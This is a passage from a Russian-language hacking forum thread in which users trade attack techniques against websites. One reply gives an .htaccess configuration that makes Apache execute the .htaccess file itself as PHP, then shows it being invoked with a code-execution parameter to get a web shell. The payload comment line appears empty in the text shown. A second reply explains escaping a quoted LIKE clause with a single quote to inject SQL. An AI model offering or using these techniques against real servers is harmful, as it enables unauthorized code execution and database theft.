18.12.2011, 13:57
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от SecondLife
Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.
Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.
Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.
http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html
создаешь .htaccess с таким содержимым:
Код:
Order allow,deny
Allow from all
AddType application/x-httpd-php .htaccess
#
и вызываешь так: site.com/.htaccess?e=phpinfo();
Сообщение от faza02
Код:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'
мой запрос в кавычках, как от этого избавиться? нужно как минимум поставить одинарную кавычку:
SELECT * FROM db WHERE bd1 like '% ' order by 100#'
|
|
|